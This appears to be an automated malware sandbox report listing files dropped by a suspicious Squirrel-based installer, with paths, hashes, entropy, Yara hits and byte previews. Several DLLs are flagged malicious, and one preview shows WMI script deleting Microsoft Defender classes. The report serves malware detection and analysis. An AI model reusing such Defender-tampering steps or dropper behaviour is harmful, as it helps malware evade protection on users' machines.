                                                                            SSDEEP:192:7HXRd28sT8KNWW+WfjIWe/W9WZWeWW+WfjIWe/WlWkNWSuWOJW:7hd28sT1NWXWkW+W9WZWeWXWkW+WlWk/
                                                                            MD5:5D46933E794A91BFDF12CDA3348BDE8B
                                                                            SHA1:F940EC0F7C8DC00F599D24020C6785D217C8B07F
                                                                            SHA-256:69550BAD9F1CD6BAB05EC9DACD5A105BF2CBD93856217AFD6722F9C62CAB104F
                                                                            SHA-512:CCDC2E8015CC1C97B475A32F7F451C1B78CD1C80CD10E79DB123A30D5B8BA120F0D5CD68DC25DD19A09834553D072E56A4AC406AEC4C73B7DC9E199D8309C6A1
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......... ...............................................@......^.....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc.... ... ......................@..@....oM.7........l...P...P.......oM.7........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....".......rsrc$02.... ...Z..../..)......C....b.)....oM.7........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):8192
                                                                            Entropy (8bit):3.658761008984688
                                                                            Encrypted:false
                                                                            SSDEEP:96:82qJtEfs2mSpy99V9KzEcEKLqBrEhMABGTzG1BNB9SBJWp+CWMeO4x9:82qJaPmDAzzDgBJWpFWMeT9
                                                                            MD5:353FFC1C5EAF0A900FABCAAB968ED76E
                                                                            SHA1:ED9F2EDA723C924D2F22F9B1F3EDF0A0B522A02B
                                                                            SHA-256:36B16B933C7E5EB93A2AD8D11F38C7793B60F09472EC9664C17E786C7361551E
                                                                            SHA-512:A28C3EC8A503BB133B9EFA158D6454CB6A39A3A4F4E98C13A19901D4DE1A86153AC081B5AF8B9CF01D45A33A8946A07CB1DB2081D89D2EB1A431416DA171542A
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................@......Mk....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc.... ... ......................@..@....o..........l...P...P.......o..........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... ..p....rsrc$01....p"..8....rsrc$02.... ...5...p.......9ps].A,wEW.....o..........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):39936
                                                                            Entropy (8bit):3.5026787417351337
                                                                            Encrypted:false
                                                                            SSDEEP:384:0R6xvTgGhZ88YmErAJwj18ChH1WgQLP89oH10fBrLjDWQWyg:qogaHYtAfc1akI1aLPg
                                                                            MD5:6817F98F4E0D412F0313C417100B89A6
                                                                            SHA1:4B1D40AE23935F47BE28E45827404C008481BE5B
                                                                            SHA-256:BA423B0529EDD4AC44F0A8FA2AABB28A3B422EEF351C3E0C06E44544350683CC
                                                                            SHA-512:07034BA97D2CF7C7334E72F998529A40C6AFB0B94881DA107ABDAB09753A8F7B575451AB06B0C6BC52BBE230B4B14F6BDA3612B9B65C7E1C0027DAD53CC34BC5
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.....................................................................@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....]'.........l...P...P........]'.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%......rsrc$02.... ...@.`........m\.L.HO...i.<.U.x.]'.........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:C source, Unicode text, UTF-16, little-endian text, with very long lines (9654), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):103370
                                                                            Entropy (8bit):3.5117432836886926
                                                                            Encrypted:false
                                                                            SSDEEP:1536:0UijGqj13Lh495o14sJ5nGY4w2Y4CZnm//:WGqjFC95oqkVZk
                                                                            MD5:EAC0C55B5DDE369B236E10E36FAFECA5
                                                                            SHA1:1E19CE7B3E89460ABE9552E6B7EB3CECE169C67F
                                                                            SHA-256:71FB552585CD8C9496BF3127A6D032E6C76DFCF6C5A141B546A735F214905CCE
                                                                            SHA-512:B7406D4E02D65248DE901C6FD4CACF53A37FC932188B40FEB564937DA777296CBE22899893BCB00C56DCB5EC2D9F7966C1506BC76A2490AFD15CFA54B3F15C7C
                                                                            Malicious:false
                                                                            Preview:..#.p.r.a.g.m.a. .a.u.t.o.r.e.c.o.v.e.r.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).....i.n.s.t.a.n.c.e. .o.f. ._._.n.a.m.e.s.p.a.c.e.{. .n.a.m.e.=.".M.S._.4.1.6.".;.}.;.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.\.\.M.S._.4.1.6.".).........[.D.e.s.c.r.i.p.t.i.o.n.(.".E.s.t.a. ... .u.m.a. .c.l.a.s.s.e. .a.b.s.t.r.a.t.a. .q.u.e. .m.o.s.t.r.a. .o. .s.t.a.t.u.s. .b.a.s.e...".). .:. .A.m.e.n.d.e.d. .T.o.S.u.b.c.l.a.s.s.,.A.M.E.N.D.M.E.N.T.,. .L.O.C.A.L.E.(.".M.S._.4.1.6.".).]. .....c.l.a.s.s. .B.a.s.e.S.t.a.t.u.s.....{.....}.;.........[.D.e.s.c.r.i.p.t.i.o.n.(.".E.s.t.a. ... .u.m.a. .c.l.a.s.s.e. .a.b.s.t.r.a.t.a. .q.u.e. .m.o.s.t.r.a. .o. .s.t.a.t.u.s. .b.a.s.e...".). .:. .A.m.e.n.d.e.d. .T.o.S.u.b.c.l.a.s.s.,.A.M.E.N.D.M.E.N.T.,. .L.O.C.A.L.E.(.".M.S._.4.1.6.".).]. .....c.l.a.s.s. .M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s. .
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:C source, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1118
                                                                            Entropy (8bit):3.459513705694916
                                                                            Encrypted:false
                                                                            SSDEEP:24:QXbclK2UWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzfWvlDQzyWvlDQzEWvT:e1TjDGwJ3r24RFZC
                                                                            MD5:606AA235BE1B21761E91A75475BB4CCA
                                                                            SHA1:437D21FC2BDD385A6540428B2B99D45191A38BB2
                                                                            SHA-256:9437B33FEDF880B480913612671D83AA56D7753B76D5E728DD73B9205E8A9B98
                                                                            SHA-512:3DAB122B4C4E868E687888579C0C3D3EAB561BA9F560B9A01ECC705FC5FD41B52EE42BC749382C122BA3DAA9BC203B1231DCC948654C36DC2F9B0D47A62AD6BF
                                                                            Malicious:false
                                                                            Preview:..#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e. .(. .".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.\.\.M.S._.4.1.6.".).........#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.E.v.e.n.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.H.e.a.r.t.B.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.P.r.e.f.e.r.e.n.c.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.c.a.n.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.i.g.n.a.t.u.r.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.C.a.t.a.l.o.g.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.D.e.t.e.c.t.i.
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3584
                                                                            Entropy (8bit):3.7438394010156575
                                                                            Encrypted:false
                                                                            SSDEEP:48:ypr95MHUR8U6NFc4qy/F1rqZWd9hffmb/i7N4x93S:q0oyW9urCWCI4xs
                                                                            MD5:3464E072F66FFE6CF4DF06CF9C11D331
                                                                            SHA1:197566FD1A73D5BE8D3A720A51DB02329C6DFC54
                                                                            SHA-256:EF12115438168F6CFD797E991A7BE561812719EB31127EBC8E0B418726452520
                                                                            SHA-512:1FBC4432610257E7A5A152E07EA905EEF6DF0F15558231C01AA4C0E89A39C9FF6ABF77C8C9644BDB224B47B9E4915DA16CAFD3CC3C58A74F9EC7A9E5C4D9AD2A
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................0............@.......................................... .. ...............................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....5<)........l...P...P........5<)........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ....x.j...!(y....l......)(2r.5<)........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):468312
                                                                            Entropy (8bit):5.621872137435956
                                                                            Encrypted:false
                                                                            SSDEEP:6144:+/fJNDoSCaKgg6OEBCOJzXv5ApNMY0lESLMp+W8j1sl3FIY/VLIVuV3Y0CC7HHmc:+/fDTCzgg6T3ALULE+WNl3yCIBL+
                                                                            MD5:85E67579A416A86D726D4AEC49F0EF87
                                                                            SHA1:2D7D1C1213B09924F926D9C6197A60CC3F617B3C
                                                                            SHA-256:112891EB9C3B06F6B95919E34BDDC607AF76EB9AEAEDE8E3BF3147709F0AE3B4
                                                                            SHA-512:0FB7A0C0A510A4EC9540B5A6EBA94D27BEEB4B9AE7E17DEF1DD3EF095ACAE5E66ED067EFE4A9873EB73969F48EBF29A0B7B042CEFA9C1E2187B41C00F3ED933F
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-G..i&..i&..i&..`^<.o&.."^..m&.."^..{&..i&...'.."^..L&.."^..c&.."^..h&.."^...&.."^P.h&.."^..h&..Richi&..........PE..d....l\..........." .........0...... ...............................................p,....`A................................................x............c...`...-......X%...........R..p.......................(...@...@............................................text............................... ..`.rdata..Z).......0..................@..@.data....H.......@..................@....pdata...-...`...0...P..............@..@.rsrc....c.......p..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):8192
                                                                            Entropy (8bit):0.363788168458258
                                                                            Encrypted:false
                                                                            SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                                            MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                                            SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                                            SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                                            SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                                            Malicious:false
                                                                            Preview:*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1310720
                                                                            Entropy (8bit):1.3107933906962441
                                                                            Encrypted:false
                                                                            SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrz:KooCEYhgYEL0In
                                                                            MD5:E3EAE6AD1D9B832CC765A23DC73C743B
                                                                            SHA1:1056035EA8FA843542191914D942D783577FD818
                                                                            SHA-256:264D213B9A42A1ED9EB37C41FBBB05FAFB3EADA45BE1734E8EEB1BE39CA7AB91
                                                                            SHA-512:2B5E06CCF9B0DCB27387263DBF6AE5305E55956CB6896B9816A175132AAF0FD3107E66F8A27BCECED868E3D04D213EB8B60FE4AE0CDBFB2C051F5ED2AFC6AC89
                                                                            Malicious:false
                                                                            Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf75d4465, page size 16384, Windows version 10.0
                                                                            Category:dropped
                                                                            Size (bytes):1310720
                                                                            Entropy (8bit):0.4222019192565745
                                                                            Encrypted:false
                                                                            SSDEEP:1536:HSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:Hazag03A2UrzJDO
                                                                            MD5:2499013D27F5239BF8D5980200CBFCE3
                                                                            SHA1:237C80377B64E007AF0B9D7B528F31316848C4A4
                                                                            SHA-256:662051BB362E23FC849CD651901A411E3C74A8E4ED16137061A4E1A43971C436
                                                                            SHA-512:1AB554070ECF11884C3597E4F869DA6C06CBEEAEF705ADC237DF481B58272C3ED23A3D7E5A1DDCB8CA665C0064E95997040191ED99975BE533CF52A946CE13D3
                                                                            Malicious:false
                                                                            Preview:.]De... .......Y.......X\...;...{......................n.%.....%"...|... ...|..h.#.....%"...|..n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................>.3.%"...|...................8l.%"...|...........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):16384
                                                                            Entropy (8bit):0.07805368356711997
                                                                            Encrypted:false
                                                                            SSDEEP:3:kVmXUetYeJUeWlllUpcEKlllaZAHpgElllallOE/tlnl+/rTc:tzJUbSBakZAukApMP
                                                                            MD5:72C8FE93D26D6ABB1EEF0346FAD00808
                                                                            SHA1:C6F0F49842E6FD098E9C4F4356BF096BED32390A
                                                                            SHA-256:A560EB2071442ED9B5138289985F67DBFF60BAB509C54C375C6FE9B3DF090BFC
                                                                            SHA-512:D180589EFD48D7B5128FCACCF600311DB89FEAB38E541CE9381781107E754A337E13F28E7C9608BB3F7F4BBD9A8197C0DD74F66D69306C82BDA07ACB1BCBBC39
                                                                            Malicious:false
                                                                            Preview:w._0.....................................;...{... ...|..%"...|..........%"...|..%"...|....U.%"...|...................8l.%"...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):195072
                                                                            Entropy (8bit):6.4531672862338665
                                                                            Encrypted:false
                                                                            SSDEEP:3072:SZzaqLh5m21b4n86fZHi8c62bdq32BsWtEGwF4JOAg0FuDTT6ETeMU:SZzvhs2Z4n1E7g34XtVYAOfTdpU
                                                                            MD5:8592377C52716F08DE428E2D519492A8
                                                                            SHA1:B262A95F384E0C52C5233E7D9BF222D98EC3B03D
                                                                            SHA-256:70A5A6ECA7B6C40D5B3B2D9D80B8524771540007514ADCC8C565B6FDFFA75AF0
                                                                            SHA-512:3A098656A443F70B1D63E18F5F813A2E2FD1558237BE7CBE2BC81FF42D8C8ED9325125D1A0E21DF9AFE9DD7C4343467449BF22E12542422DC45B8E58B78CA6B8
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e..O.S.O.S.O.S.).R.O.S.).R.O.S.).R.O.S.'.R.O.S.'.R.O.S.'.R.O.S.).R.O.S.O.S.O.S5&.R.O.S5&.S.O.S.O.S.O.S5&.R.O.SRich.O.S........................PE..L.....p_.....................:......+.............@..........................@............@.....................................<................................!......p...............................@...............,............................text...8........................... ..`.rdata..V...........................@..@.data....#..........................@....rsrc...............................@..@.reloc...!......."..................@..B........................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1899520
                                                                            Entropy (8bit):5.894883178349122
                                                                            Encrypted:false
                                                                            SSDEEP:24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
                                                                            MD5:A560BAD9E373EA5223792D60BEDE2B13
                                                                            SHA1:82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
                                                                            SHA-256:76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
                                                                            SHA-512:58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Extra\Update.exe, Author: Joe Security
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.p_............................>.... ........@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H.......LU..............,.................................................{....*..{....*..{....*r.(......}......}......}....*....0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o....*.*..0..K....... .A. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X*..0...........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*....{....*..{....*
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):359424
                                                                            Entropy (8bit):7.8682236372661025
                                                                            Encrypted:false
                                                                            SSDEEP:6144:c2btXaOTpTmDulCmhL9J0l68iG99WGS7UMfCrc+l7qwXR60dJ4I7u8FMWzs3t:cqXacTaulCSRO6iWnAMqQ+l7qwXR5ud3
                                                                            MD5:A8AEC0D17F15C613DCCAD945FCF6F928
                                                                            SHA1:FD5BA9AD64AAD1DA3B272D9056991A0EA0C6BBF4
                                                                            SHA-256:9F74526AC2718F5BB1FAAF77E09F40DECA372433659FDC328962A3DFC68CEAC9
                                                                            SHA-512:0EC27A882D8F3EC002847B87DA8FDCE50E80AA6D14B852808CC43BE8222D18A468142D91EAF702AC9EDCEA3BF9318655063874E65C33742D76D9362B6327085B
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0..t............... .....@..... ....................................`...@......@............... ..............................................................0...8............................................................ ..H............text...7r... ...t.................. ..`.rsrc................v..............@..@........................................H........M...2..............0...........................................6.(.....(....*...0..........r...ps......o.......;...%.rX..p.%..{....o.....%.r...p.%..{....o.....%.r...p.%..{....o.....%.r...p.%..{....o.....%.r...p.%...{....o.....%..r...p.%...{....o.....%..r...p.(.....s....o....&r...p.s....o....o....,+r?..p.{....o....rS..p(....r...p(....&.(.....( .....o!...("...&...o#...*..................0..a........{....r...po$....{....r...po$....{....r...po$....{....r...po$....{....r...po$...
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):28
                                                                            Entropy (8bit):4.182005814760213
                                                                            Encrypted:false
                                                                            SSDEEP:3:6jbYT:8ba
                                                                            MD5:2CB6C90CD8C364ACF10C947776B6EC27
                                                                            SHA1:FF04A8CF186D056F8071580A6197F7C00793CA21
                                                                            SHA-256:EF3A8B8FCD80C198CD846B85ED0E6C6536F3FB3AF7E89FFAAE153CCDC9703A50
                                                                            SHA-512:EB7D6E74BC901BF6A7BAC124C1C75CB31214700203A449CFB2AE13CFF8FB67CFDFECEC2F3BD1AAF046F0797BE1C8795F0E6E618E5F6589BF6484C3B053972C8C
                                                                            Malicious:false
                                                                            Preview:hykja412:Tower:diskres:Extra
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):29199008
                                                                            Entropy (8bit):7.999994459380155
                                                                            Encrypted:true
                                                                            SSDEEP:786432:y4Qt269TaEKww6K57xSukh8+CHwsotYrb:y4Ql9DKwoxNkEwsotYrb
                                                                            MD5:8886271A4B21844F93E092F3F413AC0B
                                                                            SHA1:F7899BB6D91F36C0FAA6CD45BFE5B2F84320CBF0
                                                                            SHA-256:8BBC026C9097E653A98C1F44F9435CDF1018DEBF3797A15AA19B0B2E3227A239
                                                                            SHA-512:41BD3A26830D359DEC7824095C63D6375321CE24351DCEB5DD43ED922918E40B7E44B5B859B1D8948A272385C24198419486D2CF0E17C7225EEAD3F6973B76A9
                                                                            Malicious:false
                                                                            Preview:c.P...du....pKA....h..9......a...O.Z.%`..a*r<...L..E.?f-..b..C.R..Rn..2....+..f..N....Avh..w..0.Q3t...D.P.......9/.;.(.t..=.O.0..y.k..b@Df`..;..EAA?.+./i..C.mI...D....vNa...Xi.(.Vj...S...a.0h.].d...I.&..r.....N...2.....g.md..tBL{L.?....s..:i'Q3lk<..4BE.D!.I..g....9l.Ih..OU...k^....Z..Vb.#......t<...'...@a.X.....K.g.k....'.'.sw'.U...:Yt..^a(%.`..W-..[......o..D.)z_w....\..F..P.O.t...e.>.g...H(. C...2.m.fm...P8.<.Xf..E....V..........p+.r..9.Bi...C..!..d...z.yN;.U.q.m".ZM...u.2 W(....V.....D"....y..w...R?.)j..b|..G.-HJ..\.......,.nG.f..;.z.3...-.L...f.f.<./..r.Yx..C.>.....;y.s....~.:!.......*.;..l...G.d..hb.).$......{.)..%.<.$Q..f.@.c.S...y...:.d.0u.*..u..{<.KK......d<...f.Sp*C.N..../J...ONl.(....:.k....Dp..B..&........V..#..Z...'..E.8.F.I@.1X..B......AST..jyl...Mw.....KN..+..|]".w..P....i........Fv....".."4Z.[.4...Rx.0.C..C.)..|......J..A......n.p..N.~./.......Pj.V...~"......{.c....y.U.\f...+.P[.4.K5{..L.Z......X..h.#..I..hd....8.A.4...=..
                                                                            Process:C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):29199006
                                                                            Entropy (8bit):0.9008661682526443
                                                                            Encrypted:false
                                                                            SSDEEP:24576:exUDr9N97nRUQQ251L4JJB5N7cgLlAwwV/RBqS4XglqKiQmqJYYUcCfvVLqoG7dx:ei5JzQPkRAS4w7mq6o7diJFT6+kdSde
                                                                            MD5:EF839781397F38D05548467E490024AD
                                                                            SHA1:FF5018651431DC83BFDD8D82A114DD3760542B33
                                                                            SHA-256:480713BA0F339A9361AC516EC9FD06C0E43C18C8BE06BF6E647D580F7017BF3E
                                                                            SHA-512:AE920D424E945FA8161785EF222D59872EB513BB06B4D50BF2D548977063CD086C0211EFFBA160B9A5C595A295C399635089EB70C9B4A1F6948585676C0F08FC
                                                                            Malicious:true
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...&W.e.................Z".........xw"......."...@...........................'.......................................#.......#.<:....'.......................#.......................................................#.......#......................text....A"......B"................. ..`.itext.......`"......F"............. ..`.data........."......^".............@....bss....@g....#..........................idata..<:....#..<....".............@....didata.......#......(#.............@....edata........#......4#.............@..@.rdata..D.....#......6#.............@..@.reloc........#......8#.............@..B.rsrc.........'......P&.............@..@..............'.......&.............@..@........................................................
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                            Category:dropped
                                                                            Size (bytes):29633574
                                                                            Entropy (8bit):7.999993888900749
                                                                            Encrypted:true
                                                                            SSDEEP:786432:G4Qt269TaEKww6K57xSukh8+CHwsotYrn:G4Ql9DKwoxNkEwsotYrn
                                                                            MD5:50212CBB0F92B6E321CFB929AA665B1E
                                                                            SHA1:9D66ACA98B9CF2BEA1F098ADD4AE3E4098DCFC7B
                                                                            SHA-256:57C498CAD1C976690EC840CF581D5F5D2AD4D514009224A538C796FE457965B7
                                                                            SHA-512:97AFB6F8EB2E94E971F2DFBCBCDDB5CC2053AA27C3729C0753F45FC50B3233A73B81E0D9A4E6428EF6825A2B6C70AB7C477A5828FD2996BE9E31084FE3D452CD
                                                                            Malicious:false
                                                                            Preview:PK........M.=X.I;.............Extra.nuspecu._J.0.......n.[AD.,".y..N.`..d..#y.../.......6....|L.?>.v..{..w-.T5g...Z>S.u...B....,.]j.H......TY..O..J{..o..M.i...7...ZR..2.ER."......E% WkoM%s....bQ..eh.EQ3.>...XT..../F|.M.'..%....).Q.jJ(..^.;L:.@9gy..U\i.V..1.?.>..F...b_.5us-....'.......PK........M.=X................lib/PK........M.=X................lib/net48/PK........M.=X...~............lib/net48/diskres.dllc.P...du....pKA....h..9......a...O.Z.%`..a*r<...L..E.?f-..b..C.R..Rn..2....+..f..N....Avh..w..0.Q3t...D.P.......9/.;.(.t..=.O.0..y.k..b@Df`..;..EAA?.+./i..C.mI...D....vNa...Xi.(.Vj...S...a.0h.].d...I.&..r.....N...2.....g.md..tBL{L.?....s..:i'Q3lk<..4BE.D!.I..g....9l.Ih..OU...k^....Z..Vb.#......t<...'...@a.X.....K.g.k....'.'.sw'.U...:Yt..^a(%.`..W-..[......o..D.)z_w....\..F..P.O.t...e.>.g...H(. C...2.m.fm...P8.<.Xf..E....V..........p+.r..9.Bi...C..!..d...z.yN;.U.q.m".ZM...u.2 W(....V.....D"....y..w...R?.)j..b|..G.-HJ..\.......,.nG.f..;.z.3...-.L..
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):75
                                                                            Entropy (8bit):4.810103650577109
                                                                            Encrypted:false
                                                                            SSDEEP:3:7om3ncIh6Vcmys3jlnF9fJxrGo:fMIh+cTsTlnDjGo
                                                                            MD5:24A3B66227DEF1B92C422BAA7C77D48E
                                                                            SHA1:0AB2FE17497F76458D312A25A614F7A83D77DB43
                                                                            SHA-256:B3F058CCB0C2ED25372204A558005422B780BF487FA5E2A0E2C1CC24C3B5D177
                                                                            SHA-512:EA44D50A83B43CE064B69A83272C7AC161FE6F62C620CCC360C1C4B98A2723BE931D687D118B0EB4D4091178F1D8668FAF768DB516C139953D21F39259E0E65E
                                                                            Malicious:false
                                                                            Preview:.9D66ACA98B9CF2BEA1F098ADD4AE3E4098DCFC7B Extra-1.0.0-full.nupkg 29633574
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):75
                                                                            Entropy (8bit):4.810103650577109
                                                                            Encrypted:false
                                                                            SSDEEP:3:7om3ncIh6Vcmys3jlnF9fJxrGo:fMIh+cTsTlnDjGo
                                                                            MD5:24A3B66227DEF1B92C422BAA7C77D48E
                                                                            SHA1:0AB2FE17497F76458D312A25A614F7A83D77DB43
